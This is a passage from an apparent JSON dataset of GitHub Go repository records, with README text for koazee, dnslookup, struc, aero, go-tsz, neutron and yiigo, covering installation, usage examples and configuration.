3]\nstream.Set(0,5): [5 5 4 3 2 7 1 8 2 3]\nstream.Pop(): 1 ... [5 4 3 2 7 1 8 2 3]\n*/\n```\n\n##### tream.Count / stream.IndexOf / stream.IndexesOf / stream.LastIndexOf / stream.Contains\nThese operations return info from the elements in the stream\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", numbers)\n\tstream := koazee.StreamOf(numbers)\n\tcount, _ := stream.Count()\n\tfmt.Printf(\"stream.Count(): %d\\n\", count)\n\tindex, _ := stream.IndexOf(2)\n\tfmt.Printf(\"stream.IndexOf(2): %d\\n\", index)\n\tindexes, _ := stream.IndexesOf(2)\n fmt.Printf(\"stream.IndexesOf(2): %d\\n\", indexes)\n\tindex, _ = stream.LastIndexOf(2)\n\tfmt.Printf(\"stream.LastIndexOf(2): %d\\n\", index)\n\tcontains, _ := stream.Contains(7)\n\tfmt.Printf(\"stream.Contains(7): %v\\n\", contains)\n}\n\n/**\ngo run main.go\n\ninput: [1 5 4 3 2 7 1 8 2 3]\nstream.Count(): 10\nstream.IndexOf(2): 4\nstream.IndexesOf(2): [4 8]\nstream.LastIndexOf(2): 8\nstream.Contains(7): true\n*/\n```\n\n##### stream.Sort / stream.Reverse\nThese operations organize the elements in the stream.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n\t\"strings\"\n)\n\nvar animals = []string{\"lynx\", \"dog\", \"cat\", \"monkey\", \"fox\", \"tiger\", \"lion\"}\n\nfunc main() {\n\tfmt.Print(\"input: \")\n\tfmt.Println(animals)\n\tstream := koazee.StreamOf(animals)\n\n\tfmt.Print(\"stream.Reverse(): \")\n\tfmt.Println(stream.Reverse().Out().Val())\n\n\tfmt.Print(\"stream.Sort(strings.Compare): \")\n\tfmt.Println(stream.Sort(strings.Compare).Out().Val())\n\n}\n\n/**\ngo run main.go\n\ninput: [lynx dog cat monkey fox tiger lion]\nstream.Reverse(): [lion tiger fox monkey cat dog lynx]\nstream.Sort(strings.Compare): [cat dog fox lion lynx monkey tiger]\n*/\n```\n\n##### stream.Take / stream.Filter / stream.RemoveDuplicates\nThese operations return a filtered stream.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar animals = []string{\"lynx\", \"dog\", \"cat\", \"monkey\", \"dog\", \"fox\", \"tiger\", \"lion\"}\n\nfunc main() {\n\tfmt.Print(\"input: \")\n\tfmt.Println(animals)\n\tstream := koazee.StreamOf(animals)\n\n\tfmt.Print(\"stream.Take(1,4): \")\n\tfmt.Println(stream.Take(1, 4).Out().Val())\n\n\tfmt.Print(\"stream.Filter(len==4): \")\n\tfmt.Println(stream.\n\t\tFilter(\n\t\t\tfunc(val string) bool {\n\t\t\t\treturn len(val) == 4\n\t\t\t}).\n\t\tOut().Val(),\n\t)\n\tfmt.Print(\"stream.RemoveDuplicates(): \")\n\tfmt.Println(stream.RemoveDuplicates().Out().Val())\n}\n\n/**\ngo run main.go\n\ninput: [lynx dog cat monkey dog fox tiger lion]\nstream.Take(1,4): [dog cat monkey dog]\nstream.Filter(len==4): [lynx lion]\nstream.RemoveDuplicates(): [lynx dog cat monkey fox tiger lion]\n*/\n```\n##### stream.GroupBy\nThis operation creates groups depending on the returned function value\n\nYou can now optionally return an error as the second parameter to stop processing of the stream. The error will be available in `stream.Out().Err().UserError()`.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n\t\"strings\"\n)\n\nvar animals = []string{\"lynx\", \"dog\", \"cat\", \"monkey\", \"dog\", \"fox\", \"tiger\", \"lion\"}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", animals)\n\tstream := koazee.StreamOf(animals)\n\tfmt.Print(\"stream.GroupBy(strings.Len): \")\n\tout, _ := stream.GroupBy(func(val string)int{return len(val)})\n\tfmt.Println(out)\n}\n\n/**\ngo run main.go\n\ninput: [lynx dog cat monkey dog fox tiger lion]\nstream.GroupBy(strings.Len): map[5:[tiger] 4:[lynx lion] 3:[dog cat dog fox] 6:[monkey]]\n*/\n```\n\n\n##### stream.Map\nThis operation performs a modification over all the elements in the stream.\n\nYou can now optionally return an error as the second parameter to stop processing of the stream. The error will be available in `stream.Out().Err().UserError()`.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n\t\"strings\"\n)\n\nvar animals = []string{\"lynx\", \"dog\", \"cat\", \"monkey\", \"dog\", \"fox\", \"tiger\", \"lion\"}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", animals)\n\tstream := koazee.StreamOf(animals)\n\tfmt.Print(\"stream.Map(strings.Title): \")\n\tfmt.Println(stream.Map(strings.Title).Do().Out().Val())\n}\n\n/**\ngo run main.go\n\ninput: [lynx dog cat monkey dog fox tiger lion]\nstream.Map(strings.Title): [Lynx Dog Cat Monkey Dog Fox Tiger Lion]\n*/\n```\n\n##### stream.Reduce\nThis operation give us a single output after iterating over the elements in the stream.\n\nYou can now optionally return an error as the second parameter to stop processing of the stream. The error will be available in `stream.Out().Err().UserError()`.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", numbers)\n\tstream := koazee.StreamOf(numbers)\n\tfmt.Print(\"stream.Reduce(sum): \")\n\tfmt.Println(stream.Reduce(func(acc, val int) int {\n\t\treturn acc + val\n\t}).Int())\n}\n\n/**\ngo run main.go\n\ninput: [1 5 4 3 2 7 1 8 2 3]\nstream.Reduce(sum): 36\n*/\n```\n\n##### stream.ForEach\nThis operation iterates over the element in the stream.\n\nYou can now optionally return an error as the second parameter to stop processing of the stream. The error will be available in `stream.Out().Err().UserError()`.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\ntype message struct {\n\tuser string\n\tmessage string\n}\n\nvar messages = []*message{\n\t{user: \"John\", message: \"Hello Jane\"},\n\t{user: \"Jane\", message: \"Hey John, how are you?\"},\n\t{user: \"John\", message: \"I'm fine! and you?\"},\n\t{user: \"Jane\", message: \"Me too\"},\n}\n\nfunc main() {\n\n\tstream := koazee.StreamOf(messages)\n\tstream.ForEach(func(m *message) {\n\t\tfmt.Printf(\"%s: \\\"%s\\\"\\n\", m.user, m.message)\n\t}).Do()\n}\n\n/**\ngo run main.go\n\nJohn: \"Hello Jane\"\nJane: \"Hey John, how are you?\"\nJohn: \"I'm fine! and you?\"\nJane: \"Me too\"\n*/\n```\n\n#### Combine operations and evaluate them lazily\nThe main goal of Koazee is providing a set of operations that can be combined and being evaluated lazily.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n\t\"strings\"\n)\n\ntype Person struct {\n\tName string\n\tMale bool\n\tAge int\n}\n\nvar people = []*Person{\n\t{\"John Smith\", true, 32},\n\t{\"Peter Pan\", true, 17},\n\t{\"Jane Doe\", false, 20},\n\t{\"Anna Wallace\", false, 35},\n\t{\"Tim O'Brian\", true, 13},\n\t{\"Celia Hills\", false, 15},\n}\n\nfunc main() {\n\tstream := koazee.\n\t\tStreamOf(people).\n\t\tFilter(func(person *Person) bool {\n\t\t\treturn !person.Male\n\t\t}).\n\t\tSort(func(person, otherPerson *Person) int {\n\t\t\treturn strings.Compare(person.Name, otherPerson.Name)\n\t\t}).\n\t\tForEach(func(person *Person) {\n\t\t\tfmt.Printf(\"%s is %d years old\\n\", person.Name, person.Age)\n\t\t})\n\n\tfmt.Println(\"Operations are not evaluated until we perform stream.Do()\\n\")\n\tstream.Do()\n}\n\n/**\ngo run main.go\n\nOperations are not evaluated until we perform stream.Do()\n\nAnna Wallace is 35 years old\nCelia Hills is 15 years old\nJane Doe is 20 years old\n */\n```\n\n## Available Operations\n\n| Operation | Description | Since |\n|---|---|---|\n| Add | It adds a new element in the last position | v0.0.1 |\n| At | It returns the element in the given position | v0.0.1 |\n| Contains | It checks if the given element is found in the stream.| v0.0.1 |\n| Count | It returns the number of elements in a stream| v0.0.1 |\n| DeleteAt| It remove the elements in the given position | v0.0.3 |\n| Drop | It removes an element from the stream | v0.0.1 |\n| DropWhile | It removes the elements in the stream that match with the given input function | v0.0.4 |\n| Filter | It discards those elements that doesn't match with the provided filter| v0.0.1 |\n| First | It returns the element in the first position | v0.0.1 |\n| ForEach | It does something over all the elements in the stream.| v0.0.1 |\n| GroupBy | It creates groups depending on the returned function value| v0.0.4 |\n| IndexOf | It returns the first index of the element in the stream.| v0.0.3 |\n| IndexesOf | It returns the index for all the occurrences of the element in the stream.| v0.0.4 |\n| Last | It returns the element in the last position | v0.0.1 |\n| LastIndexOf | It returns the last occurrence for the element in the stream.| v0.0.3 |\n| Map | It converts the element in the stream | v0.0.1 |\n| Pop | It extracts the first element in the stream and return this and the new stream | v0.0.3 |\n| Reduce | It reduceshe stream to a single value by executing a provided function for each value of the stream| v0.0.1 |\n| RemoveDuplicates | It removes duplicated elements.| v0.0.1 |\n| Reverse| It reverses the sequence of elements in the stream.| v0.0.3 |\n| Set | It replaces the element in the given index by the provided value | v0.0.3 |\n| Sort | It sorts the elements in the stream| v0.0.1 |\n| Take | It returns a stream with the elements between the given indexes | v0.0.3 |\n\n## Samples\n\nA rich and growing set of examples can be found on [koazee-samples](https://github.com/wesovilabs/koazee-samples)\n\n## Benchmark\n\nYou can check the Benchmark for the Koazee operations [here](https://github.com/wesovilabs/koazee/wiki/Benchmark-Report)\n\nA benchmark comparison with other frameworks can be found in [Koazee vs Go-Funk vs Go-Linq](https://medium.com/@ivan.corrales.solera/koazee-vs-go-funk-vs-go-linq-caf8ef18584e)\n\n## Guides & Tutorials\n\n[Shopping cart with Koazee](https://medium.com/wesovilabs/koazee-the-shopping-cart-a381bba32955)\n\n\n## Roadmap\n\nThis is only the beginning! By the way, If you missed any operation in Koazee v0.0.3, or you found a bug, please [create a new issue on Github or vote the existing ones](https://github.com/wesovilabs/koazee/issues)!\n\n\n## Contributors\n- [@ivancorrales](https://github.com/ivancorrales)\n- [@xuyz](https://github.com/xuyz)\n- [@u5surf](https://github.com/u5surf)\n- [@flowonyx](https://github.com/flowonyx)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ameshkov/dnslookup", "link": "https://github.com/ameshkov/dnslookup", "tags": [], "stars": 514, "description": "Simple command line utility to make DNS lookups to the specified server", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/github.com/ameshkov/dnslookup)](https://goreportcard.com/report/ameshkov/dnslookup)\n[![Latest release](https://img.shields.io/github/release/ameshkov/dnslookup/all.svg)](https://github.com/ameshkov/dnslookup/releases)\n[![Snap Store](https://snapcraft.io/dnslookup/badge.svg)](https://snapcraft.io/dnslookup)\n\n# dnslookup\n\nSimple command line utility to make DNS lookups. Supports all known DNS protocols: plain DNS, DoH, DoT, DoQ, DNSCrypt.\n\n### How to install\n\n* Using homebrew:\n ```\n brew install ameshkov/tap/dnslookup\n ```\n* From source:\n ```\n go install github.com/ameshkov/dnslookup@latest\n ```\n* You can get a binary from the [releases page](https://github.com/ameshkov/dnslookup/releases).\n* You can install it from the [Snap Store](https://snapcraft.io/dnslookup)\n\n### Examples:\n\nPlain DNS:\n```\n./dnslookup example.org 94.140.14.14\n```\n\nDNS-over-TLS:\n```\n./dnslookup example.org tls://dns.adguard.com\n```\n\nDNS-over-TLS with IP:\n```\n./dnslookup example.org tls://dns.adguard.com 94.140.14.14\n```\n\nDNS-over-HTTPS with HTTP/2:\n```\n./dnslookup example.org https://dns.adguard.com/dns-query\n```\n\nDNS-over-HTTPS with HTTP/3 support (the version is chosen automatically):\n```\nHTTP3=1 ./dnslookup example.org https://dns.google/dns-query\n```\n\nDNS-over-HTTPS forcing HTTP/3 only:\n```\n./dnslookup example.org h3://dns.google/dns-query\n```\n\nDNS-over-HTTPS with IP:\n```\n./dnslookup example.org https://dns.adguard.com/dns-query 94.140.14.14\n```\n\nDNSCrypt (stamp):\n```\n./dnslookup example.org sdns://AQIAAAAAAAAAFDE3Ni4xMDMuMTMwLjEzMDo1NDQzINErR_JS3PLCu_iZEIbq95zkSV2LFsigxDIuUso_OQhzIjIuZG5zY3J5cHQuZGVmYXVsdC5uczEuYWRndWFyZC5jb20\n```\n\nDNSCrypt (parameters):\n```\n./dnslookup example.org 176.103.130.130:5443 2.dnscrypt.default.ns1.adguard.com D12B:47F2:52DC:F2C2:BBF8:9910:86EA:F79C:E449:5D8B:16C8:A0C4:322E:52CA:3F39:0873\n```\n\nDNS-over-QUIC (experimental, uses port 784):\n```\n./dnslookup example.org quic://dns.adguard.com\n```\n\nMachine-readable format:\n```\nJSON=1 ./dnslookup example.org 94.140.14.14\n```\n\nDisable certificates verification:\n```\nVERIFY=0 ./dnslookup example.org tls://127.0.0.1\n```\n\nSpecify the type of resource record (default A):\n```\nRRTYPE=AAAA ./dnslookup example.org tls://127.0.0.1\nRRTYPE=HTTPS ./dnslookup example.org tls://127.0.0.1\n```\n\nSpecify the class of query (default IN):\n```\nCLASS=CH ./dnslookup example.org tls://127.0.0.1\n```\n\nAdd EDNS0 Padding:\n```\nPAD=1 ./dnslookup example.org tls://127.0.0.1\n```\n\nVerbose-level logging:\n```shell\nVERBOSE=1 ./dnslookup example.org tls://dns.adguard.com\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lunixbochs/struc", "link": "https://github.com/lunixbochs/struc", "tags": [], "stars": 514, "description": "Better binary packing for Go", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/lunixbochs/struc.svg?branch=master)](https://travis-ci.org/lunixbochs/struc) [![GoDoc](https://godoc.org/github.com/lunixbochs/struc?status.svg)](https://godoc.org/github.com/lunixbochs/struc)\n\nstruc\n====\n\nStruc exists to pack and unpack C-style structures from bytes, which is useful for binary files and network protocols. It could be considered an alternative to `encoding/binary`, which requires massive boilerplate for some similar operations.\n\nTake a look at an [example comparing `struc` and `encoding/binary`](https://bochs.info/p/cxvm9)\n\nStruc considers usability first. That said, it does cache reflection data and aims to be competitive with `encoding/binary` struct packing in every way, including performance.\n\nExample struct\n----\n\n```Go\ntype Example struct {\n Var int `struc:\"int32,sizeof=Str\"`\n Str string\n Weird []byte `struc:\"[8]int64\"`\n Var []int `struc:\"[]int32,little\"`\n}\n```\n\nStruct tag format\n----\n\n - ```Var []int `struc:\"[]int32,little,sizeof=StringField\"` ``` will pack Var as a slice of little-endian int32, and link it as the size of `StringField`.\n - `sizeof=`: Indicates this field is a number used to track the length of a another field. `sizeof` fields are automatically updated on `Pack()` based on the current length of the tracked field, and are used to size the target field during `Unpack()`.\n - Bare values will be parsed as type and endianness.\n\nEndian formats\n----\n\n - `big` (default)\n - `little`\n\nRecognized types\n----\n\n - `pad` - this type ignores field contents and is backed by a `[length]byte` containing nulls\n - `bool`\n - `byte`\n - `int8`, `uint8`\n - `int16`, `uint16`\n - `int32`, `uint32`\n - `int64`, `uint64`\n - `float32`\n - `float64`\n\nTypes can be indicated as arrays/slices using `[]` syntax. Example: `[]int64`, `[8]int32`.\n\nBare slice types (those with no `[size]`) must have a linked `Sizeof` field.\n\nPrivate fields are ignored when packing and unpacking.\n\nExample code\n----\n\n```Go\npackage main\n\nimport (\n \"bytes\"\n \"github.com/lunixbochs/struc\"\n)\n\ntype Example struct {\n A int `struc:\"big\"`\n\n // B will be encoded/decoded as a 16-bit int (a \"short\")\n // but is stored as a native int in the struct\n B int `struc:\"int16\"`\n\n // the sizeof key links a buffer's size to any int field\n Size int `struc:\"int8,little,sizeof=Str\"`\n Str string\n\n // you can get freaky if you want\n Str2 string `struc:\"[5]int64\"`\n}\n\nfunc main() {\n var buf bytes.Buffer\n t := &Example{1, 2, 0, \"test\", \"test2\"}\n err := struc.Pack(&buf, t)\n o := &Example{}\n err = struc.Unpack(&buf, o)\n}\n```\n\nBenchmark\n----\n\n`BenchmarkEncode` uses struc. `Stdlib` benchmarks use equivalent `encoding/binary` code. `Manual` encodes without any reflection, and should be considered an upper bound on performance (which generated code based on struc definitions should be able to achieve).\n\n```\nBenchmarkEncode 1000000 1265 ns/op\nBenchmarkStdlibEncode 1000000 1855 ns/op\nBenchmarkManualEncode 5000000 284 ns/op\nBenchmarkDecode 1000000 1259 ns/op\nBenchmarkStdlibDecode 1000000 1656 ns/op\nBenchmarkManualDecode 20000000 89.0 ns/op\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "aerogo/aero", "link": "https://github.com/aerogo/aero", "tags": ["go", "web", "server", "high-performance"], "stars": 514, "description": ":bullettrain_side: High-performance web server for Go.", "lang": "Go", "repo_lang": "", "readme": "![Aero Go Logo](docs/media/aero.go.png)\n\n{go:header}\n\nAero is a high-performance web server with a clean API.\n\n{go:install}\n\n## Benchmarks\n\n[![Web server performance](docs/media/server-performance.png)](docs/Benchmarks.md)\n\n## Features\n\n- HTTP/2\n- Radix tree routing\n- Low latency\n- Bandwidth savings via automated ETags\n- Session data with custom stores\n- Server-sent events\n- Context interface for custom contexts\n\n## Links\n\n- [API](docs/API.md)\n- [Configuration](docs/Configuration.md)\n- [Benchmarks](docs/Benchmarks.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dgryski/go-tsz", "link": "https://github.com/dgryski/go-tsz", "tags": [], "stars": 514, "description": "Time series compression algorithm from Facebook's Gorilla paper", "lang": "Go", "repo_lang": "", "readme": "# go-tsz\n\n* Package tsz implement time-series compression http://www.vldb.org/pvldb/vol8/p1816-teller.pdf in Go*\n\n[![Master Branch](https://img.shields.io/badge/branch-master-lightgray.svg)](https://github.com/dgryski/go-tsz/tree/master)\n[![Master Build Status](https://secure.travis-ci.org/dgryski/go-tsz.svg?branch=master)](https://travis-ci.org/dgryski/go-tsz?branch=master)\n[![Master Coverage Status](https://coveralls.io/repos/dgryski/go-tsz/badge.svg?branch=master&service=github)](https://coveralls.io/github/dgryski/go-tsz?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/dgryski/go-tsz)](https://goreportcard.com/report/github.com/dgryski/go-tsz)\n[![GoDoc](https://godoc.org/github.com/dgryski/go-tsz?status.svg)](http://godoc.org/github.com/dgryski/go-tsz)\n\n## Description\n \nPackage tsz implement the Gorilla Time Series Databasetime-series compression as described in:\nhttp://www.vldb.org/pvldb/vol8/p1816-teller.pdf\n\n\n## Getting started\n\nThis application is written in Go language, please refer to the guides in https://golang.org for getting started.\n\nThis project include a Makefile that allows you to test and build the project with simple commands.\nTo see all available options:\n```bash\nmake help\n```\n\n## Running all tests\n\nBefore committing the code, please check if it passes all tests using\n```bash\nmake qa\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "emersion/neutron", "link": "https://github.com/emersion/neutron", "tags": ["protonmail", "imap", "webmail", "smtp", "mail"], "stars": 514, "description": "Self-hosted server for the ProtonMail client", "lang": "Go", "repo_lang": "", "readme": "# neutron\n\n[![Build Status](https://travis-ci.org/emersion/neutron.svg?branch=master)](https://travis-ci.org/emersion/neutron)\n[![GoDoc](https://godoc.org/github.com/emersion/neutron?status.svg)](https://godoc.org/github.com/emersion/neutron)\n\nSelf-hosted server for [Protonmail client](https://github.com/ProtonMail/WebClient).\n\n> This project is not affiliated or supported by ProtonMail.\n\n## What is it?\n\nNeutron is a server that will allow the ProtonMail client to be used with\n_backends_. Several backends are available right now:\n* IMAP: this will read and store messages on your IMAP server. Received messages\n will stay as is (that is, unencrypted) but messages saved from the web client\n will be encrypted. You will login to the web client with your IMAP username\n and password.\n* SMTP: this will send messages using your SMTP server. Messages are sent\n encrypted to the server. If a recipient's public key is not found, the server\n will decrypt the message before sending it to this recipient.\n* Filesystem: settings, contacts, keys are stored on disk. Keys are always\n stored encrypted.\n* Memory: all is stored in memory and will be destroyed when the server is\n stopped.\n\nNeutron is modular so it's easy to create new backends and handle more scenarios.\n\nKeep in mind that Neutron is less secure than ProtonMail: most servers don't\nuse full-disk encryption and aren't under 1,000 meters of granite rock in\nSwitzerland. Also, SRP is not yet supported ([#35](https://github.com/emersion/neutron/issues/35)).\nIf you use Neutron, make sure to [donate to ProtonMail](https://protonmail.com/donate)!\n\n## Install\n\n* Debian, Ubuntu & Fedora: ~~install from https://packager.io/gh/emersion/neutron\n and run with `neutronmail run web`~~\n* Other platforms: no packages yet, you'll have to build from source (see below)\n\n### Configuration\n\nSee `config.json`. You'll have to change IMAP and SMTP settings to match your\nmail server config.\n\n```js\n{\n\t\"Memory\": {\n\t\t\"Enabled\": true,\n\t\t\"Populate\": false, // Populate server with default neutron user\n\t\t\"Domains\": [\"emersion.fr\"] // Available e-mail domains\n\t},\n\t\"Imap\": { // IMAP server config\n\t\t\"Enabled\": true,\n\t\t\"Hostname\": \"mail.gandi.net\",\n\t\t\"Tls\": true,\n\t\t\"Suffix\": \"@emersion.fr\" // Will be appended to username when authenticating\n\t},\n\t\"Smtp\": { // SMTP server config\n\t\t\"Enabled\": true,\n\t\t\"Hostname\": \"mail.gandi.net\",\n\t\t\"Port\": 587,\n\t\t\"Suffix\": \"@emersion.fr\" // Will be appended to username when authenticating\n\t},\n\t\"Disk\": { // Store keys, contacts and settings on disk\n\t\t\"Enabled\": true,\n\t\t\"Keys\": { \"Directory\": \"db/keys\" }, // PGP keys location\n\t\t\"Contacts\": { \"Directory\": \"db/contacts\" },\n\t\t\"UsersSettings\": { \"Directory\": \"db/settings\" },\n\t\t\"Addresses\": { \"Directory\": \"db/addresses\" }\n\t}\n}\n```\n\n### Usage\n\nTo generate keys for a new user the first time, just click _Sign up_ on the\nlogin page and enter your IMAP credentials.\n\n### Options\n\n* `-config`: specify a custom config file\n* `-help`: show help\n\n## Build\n\nRequirements:\n* Go (to build the server)\n* Node, NPM (to build the client)\n\n```shell\n# Get the code\ngo get -u github.com/emersion/neutron\ncd $GOPATH/src/github.com/emersion/neutron\n\n# Build the client\ngit submodule init\ngit submodule update\nmake build-client\n\n# Start the server\nmake start\n```\n\n### Docker\n\n```shell\nmake build-docker\ndocker build -t neutron .\ndocker create -p 4000:4000 -v $PWD/config.json:/config.json -v $PWD/db:/db neutron\n```\n\n## Backends\n\nAll backends must implement the [backend interface](https://github.com/emersion/neutron/blob/master/backend/backend.go).\nThe main backend interface is split into multiple other backend interfaces for\ndifferent roles: `ContactsBackend`, `LabelsBackend` and so on. This allows to\nbuild modular backends, e.g. a `MessagesBackend` which stores messages on an\nIMAP server with a `ContactsBackend` which stores contacts on a LDAP server and\na `SendBackend` which sends outgoing messages to a SMTP server.\n\nWriting a backend is just a matter of implementing the necessary functions. You\ncan read the [`memory` backend](https://github.com/emersion/neutron/tree/master/backend/memory)\nto understand how to do that. Docs for the backend are available here:\nhttps://godoc.org/github.com/emersion/neutron/backend#Backend\n\n## License\n\nMIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "shenghui0779/yiigo", "link": "https://github.com/shenghui0779/yiigo", "tags": ["yiigo", "go", "golang", "framework", "sql-builder", "grpc-pool", "mongodb", "mysql", "redis", "dotenv", "logger", "nsq", "db", "location"], "stars": 513, "description": "\ud83d\udd25 \u4e00\u4e2a\u597d\u7528\u7684\u8f7b\u91cf\u7ea7 Go \u5f00\u53d1\u901a\u7528\u5e93 \ud83d\ude80\ud83d\ude80\ud83d\ude80", "lang": "Go", "repo_lang": "", "readme": "# yiigo\n\n[![golang](https://img.shields.io/badge/Language-Go-green.svg?style=flat)](https://golang.org) [![GitHub release](https://img.shields.io/github/release/shenghui0779/yiigo.svg)](https://github.com/shenghui0779/yiigo/releases/latest) [![pkg.go.dev](https://img.shields.io/badge/dev-reference-007d9c?logo=go&logoColor=white&style=flat)](https://pkg.go.dev/github.com/shenghui0779/yiigo) [![Apache 2.0 license](http://img.shields.io/badge/license-Apache%202.0-brightgreen.svg)](http://opensource.org/licenses/apache2.0)\n\n\u4e00\u4e2a\u597d\u7528\u7684\u8f7b\u91cf\u7ea7 Go \u5f00\u53d1\u901a\u7528\u5e93\u3002\u5982\u679c\u4f60\u4e0d\u559c\u6b22\u8fc7\u5ea6\u5c01\u88c5\u7684\u91cd\u91cf\u7ea7\u6846\u67b6\uff0c\u8fd9\u4e2a\u5e93\u53ef\u80fd\u662f\u4e2a\u4e0d\u9519\u7684\u9009\u62e9 \ud83d\ude0a\n\n## Features\n\n- \u652f\u6301 [MySQL](https://github.com/go-sql-driver/mysql)\n- \u652f\u6301 [PostgreSQL](https://github.com/jackc/pgx)\n- \u652f\u6301 [SQLite3](https://github.com/mattn/go-sqlite3)\n- \u652f\u6301 [MongoDB](https://github.com/mongodb/mongo-go-driver)\n- \u652f\u6301 [Redis](https://github.com/gomodule/redigo)\n- \u652f\u6301 [NSQ](https://github.com/nsqio/go-nsq)\n- SQL\u4f7f\u7528 [sqlx](https://github.com/jmoiron/sqlx)\n- ORM\u63a8\u8350 [ent](https://github.com/ent/ent)\n- \u65e5\u5fd7\u4f7f\u7528 [zap](https://github.com/uber-go/zap)\n- \u914d\u7f6e\u4f7f\u7528 [dotenv](https://github.com/joho/godotenv)\uff0c\u652f\u6301\uff08\u5305\u62ec k8s configmap\uff09\u70ed\u52a0\u8f7d\n- \u5176\u4ed6\n - \u8f7b\u91cf\u7684 SQL Builder\n - \u57fa\u4e8e Redis \u7684\u7b80\u5355\u5206\u5e03\u5f0f\u9501\n - Websocket \u7b80\u5355\u4f7f\u7528\u5c01\u88c5\uff08\u652f\u6301\u6388\u6743\u6821\u9a8c\uff09\n - \u7b80\u6613\u7684\u5355\u65f6\u95f4\u8f6e\uff08\u652f\u6301\u4e00\u6b21\u6027\u548c\u591a\u6b21\u91cd\u8bd5\u4efb\u52a1\uff09\n - \u5b9e\u7528\u7684\u8f85\u52a9\u65b9\u6cd5\uff0c\u5305\u542b\uff1ahttp\u3001cypto\u3001date\u3001IP\u3001validator\u3001version compare \u7b49\n\n## Installation\n\n```sh\ngo get -u github.com/shenghui0779/yiigo\n```\n\n## Usage\n\n#### ENV\n\n- load\n\n```go\n// \u9ed8\u8ba4\u52a0\u8f7d\u5f53\u524d\u76ee\u5f55\u4e0b\u7684`.env`\u6587\u4ef6\nyiigo.LoadEnv()\n\n// \u52a0\u8f7d\u6307\u5b9a\u914d\u7f6e\u6587\u4ef6\nyiigo.LoadEnv(yiigo.WithEnvFile(\"mycfg.env\"))\n\n// \u70ed\u52a0\u8f7d\nyiigo.LoadEnv(yiigo.WithEnvWatcher(func(e fsnotify.Event) {\n fmt.Println(e.String())\n}))\n```\n\n- `.env`\n\n```sh\nENV=dev\n```\n\n- usage\n\n```go\nfmt.Println(os.Getenv(\"ENV\"))\n// output: dev\n```\n\n#### DB\n\n- register\n\n```go\nyiigo.Init(\n yiigo.WithMySQL(yiigo.Default, &yiigo.DBConfig{\n DSN: \"dsn\",\n Options: &yiigo.DBOptions{\n MaxOpenConns: 20,\n MaxIdleConns: 10,\n ConnMaxLifetime: 10 * time.Minute,\n ConnMaxIdleTime: 5 * time.Minute,\n },\n }),\n\n yiigo.WithMySQL(\"other\", &yiigo.DBConfig{\n DSN: \"dsn\",\n Options: &yiigo.DBOptions{\n MaxOpenConns: 20,\n MaxIdleConns: 10,\n ConnMaxLifetime: 10 * time.Minute,\n ConnMaxIdleTime: 5 * time.Minute,\n },\n }),\n)\n```\n\n- sqlx\n\n```go\n// default db\nyiigo.DB().Get(&User{}, \"SELECT * FROM user WHERE id = ?\", 1)\n\n// other db\nyiigo.DB(\"other\").Get(&User{}, \"SELECT * FROM user WHERE id = ?\", 1)\n```\n\n- ent\n\n```go\nimport \"/ent\"\n\n// default driver\nclient := ent.NewClient(ent.Driver(yiigo.EntDriver()))\n\n// other driver\nclient := ent.NewClient(ent.Driver(yiigo.EntDriver(\"other\")))\n```\n\n#### MongoDB\n\n```go\n// register\nyiigo.Init(\n yiigo.WithMongo(yiigo.Default, \"dsn\"),\n yiigo.WithMongo(\"other\", \"dsn\"),\n)\n\n// default mongodb\nyiigo.Mongo().Database(\"test\").Collection(\"numbers\").InsertOne(context.Background(), bson.M{\"name\": \"pi\", \"value\": 3.14159})\n\n// other mongodb\nyiigo.Mongo(\"other\").Database(\"test\").Collection(\"numbers\").InsertOne(context.Background(), bson.M{\"name\": \"pi\", \"value\": 3.14159})\n```\n\n#### Redis\n\n```go\n// register\nyiigo.Init(\n yiigo.WithRedis(yiigo.Default, &yiigo.RedisConfig{\n Addr: \"addr\",\n Options: &yiigo.RedisOptions{\n ConnTimeout: 10 * time.Second,\n ReadTimeout: 10 * time.Second,\n WriteTimeout: 10 * time.Second,\n PoolSize: 10,\n IdleTimeout: 5 * time.Minute,\n },\n }),\n\n yiigo.WithRedis(\"other\", &yiigo.RedisConfig{\n Addr: \"addr\",\n Options: &yiigo.RedisOptions{\n ConnTimeout: 10 * time.Second,\n ReadTimeout: 10 * time.Second,\n WriteTimeout: 10 * time.Second,\n PoolSize: 10,\n IdleTimeout: 5 * time.Minute,\n },\n }),\n)\n\n// default redis\nyiigo.Redis().Do(context.Background(), \"SET\", \"test_key\", \"hello 